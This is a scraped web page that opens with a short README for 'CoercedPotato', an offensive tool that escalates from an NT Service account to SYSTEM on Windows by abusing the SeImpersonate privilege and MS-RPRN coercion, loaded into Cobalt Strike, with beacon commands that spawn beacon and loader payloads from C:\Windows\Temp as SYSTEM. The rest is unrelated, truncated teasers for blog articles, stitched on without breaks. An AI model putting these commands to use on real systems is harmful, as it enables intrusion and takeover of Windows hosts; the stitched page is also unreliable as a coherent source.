Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.
Reflective Loader from
Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.
You first need to spawn the RPC listener with
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgumentfor example
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.binthen you can trigger a SYSTEM call
beacon> CoercedPotato coerceIntroduction In today’s cyber threat landscape, protecting endpoints such as computers, smartphones, and tablets from…
Introduction In today's fast-paced cybersecurity landscape, incident response is critical to protecting businesses from cyberattacks.…
Artificial Intelligence (AI) is changing how industries operate, automating processes, and driving new innovations. However,…
Image credit:pexels.com If you think back to the early days of personal computing, you probably…
In an era defined by technological innovation, the way people handle and understand money has…
The online world becomes more visually driven with every passing year. Images spread across websites,…